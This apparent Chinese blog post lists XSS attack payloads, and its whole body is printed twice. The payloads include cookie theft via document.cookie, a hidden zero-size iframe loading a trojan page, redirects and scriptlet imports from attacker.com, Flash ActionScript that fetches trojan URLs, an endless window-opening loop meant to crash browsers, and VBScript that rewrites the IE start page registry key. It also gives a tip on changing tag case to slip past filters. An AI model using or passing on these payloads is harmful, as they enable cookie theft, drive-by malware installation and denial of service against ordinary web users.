XSS 攻击常用脚本
2014-12-19 20:27
183 查看
1、这个应该都知道
<script>alert("test")</script> 常用于测试 是否存在跨站
2、<script>window.alert(document.cookie);</script>
这句代码将会弹出壹个包含有浏览者cookie信息的对话框,如果用户已经通过帐号登陆网站,在显示的cookie信息中将会包含有用户的账户名和密码。
3、<script>window.open('http://www.pete.cn /default.asp','newwindow','width=200,height=200');</script>,当用户浏览该
页时,将弹出壹个高爲200,宽爲200的网页窗口,在其中打开的页面是http://www.pete.cn/default.asp
4、跨站攻击的形式是多样的,不仅可以在网页中插入跨站脚本代码,而且可以在flash文件中插入跨站脚本代码,实现跨站攻击。由于flash文件有较高 的安全性,用户通常对flash文件的警惕性不够,因此用flash文件进行跨站攻击的成功率很高。如果将这个含有跨站脚本代码的flash文件插入到网
页中,例如制作成网页banner或者广告,那么中招的用户将更多。
flash跨站是通过在flash文件中插入动作脚本来实现的,通过在flash文件“帧”的“动作”中插入跨站脚本代码来实现跨站攻击,其实现方法入下:
首先运行flash文件制作工具flash8.exe,新建壹个空白的flash文档。然后选中其中的第壹帧,进入界面下方的“动作”编辑界面,在Action Script中插入我们的跨站脚本代码
getURL("http://网页木马地址", "_blank", "GET");
loadMovieNum("http://www.pete.cn/test.swf", 0);
5、<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>
这就是 传说中的框架 - - 膜拜吧 还有JS 也可以使用,比框架更隐蔽
6、Refresh到另壹个页面:
<meta http-equiv="refresh" content="1;URL=http://www.attacker.com/another.htm">
7、scriptlet引入另壹个页面:
<object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"></object>
------------------------------------------------------------------------------------------------------------
下面来几段长的 但是 记住 要慎用 !!
1、打开无数个浏览器窗口,直至CPU超负荷,非关机不可:
<script language="JavaScript">
<!--
while (true)
{
window.open("URI"); //如果URI就是当前页本身,那就更具破坏性。
}
//-->
</script>
2、
修改注册表(IE 主页):
<script language="VBScript">
Set RegWsh = CreateObject("WScript.Shell")
'设置IE浏览器默认页
RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.attacker.com"
</script>
有时候,</script> 可以替换大小写 来躲过过滤
我最后要说的壹句话就是“害人终害己”,切记!
<script>alert("test")</script> 常用于测试 是否存在跨站
2、<script>window.alert(document.cookie);</script>
这句代码将会弹出壹个包含有浏览者cookie信息的对话框,如果用户已经通过帐号登陆网站,在显示的cookie信息中将会包含有用户的账户名和密码。
3、<script>window.open('http://www.pete.cn /default.asp','newwindow','width=200,height=200');</script>,当用户浏览该
页时,将弹出壹个高爲200,宽爲200的网页窗口,在其中打开的页面是http://www.pete.cn/default.asp
4、跨站攻击的形式是多样的,不仅可以在网页中插入跨站脚本代码,而且可以在flash文件中插入跨站脚本代码,实现跨站攻击。由于flash文件有较高 的安全性,用户通常对flash文件的警惕性不够,因此用flash文件进行跨站攻击的成功率很高。如果将这个含有跨站脚本代码的flash文件插入到网
页中,例如制作成网页banner或者广告,那么中招的用户将更多。
flash跨站是通过在flash文件中插入动作脚本来实现的,通过在flash文件“帧”的“动作”中插入跨站脚本代码来实现跨站攻击,其实现方法入下:
首先运行flash文件制作工具flash8.exe,新建壹个空白的flash文档。然后选中其中的第壹帧,进入界面下方的“动作”编辑界面,在Action Script中插入我们的跨站脚本代码
getURL("http://网页木马地址", "_blank", "GET");
loadMovieNum("http://www.pete.cn/test.swf", 0);
5、<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>
这就是 传说中的框架 - - 膜拜吧 还有JS 也可以使用,比框架更隐蔽
6、Refresh到另壹个页面:
<meta http-equiv="refresh" content="1;URL=http://www.attacker.com/another.htm">
7、scriptlet引入另壹个页面:
<object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"></object>
------------------------------------------------------------------------------------------------------------
下面来几段长的 但是 记住 要慎用 !!
1、打开无数个浏览器窗口,直至CPU超负荷,非关机不可:
<script language="JavaScript">
<!--
while (true)
{
window.open("URI"); //如果URI就是当前页本身,那就更具破坏性。
}
//-->
</script>
2、
修改注册表(IE 主页):
<script language="VBScript">
Set RegWsh = CreateObject("WScript.Shell")
'设置IE浏览器默认页
RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.attacker.com"
</script>
有时候,</script> 可以替换大小写 来躲过过滤
我最后要说的壹句话就是“害人终害己”,切记!
相关文章推荐
- 深入解析跨站点脚本攻击XSS
- 浅谈跨网站脚本攻击(XSS)的手段与防范(简析新浪微博XSS攻击事件)
- java 防止 XSS 攻击的常用方法总结.
- 浅谈跨网站脚本攻击(XSS)的手段与防范(简析新浪微博XSS攻击事件)
- java 防止 XSS 攻击的常用方法总结
- 跨站点脚本攻击(XSS)深入解析
- java 防止 XSS 攻击的常用方法总结
- java 防止 XSS 攻击的常用方法总结
- java 防止 XSS 攻击的常用方法总结.
- XSS跨脚本攻击原理
- 浅谈跨网站脚本攻击(XSS)的手段与防范(简析新浪微博XSS攻击事件)
- 网站漏洞处理(SQL注入、XSS脚本攻击、防外站提交)以及扩展思路
- 考虑使用AntiXss.HtmlEncode方法来防止跨站点脚本攻击
- java 防止 XSS 攻击的常用方法总结.
- XSS脚本攻击漫谈
- asp.net防止XSS(脚本)攻击
- xss之用户提交脚本攻击
- java 防止 XSS 攻击的常用方法总结
- java 防止 XSS 攻击的常用方法
- Java防止跨站脚本(XSS)注入攻击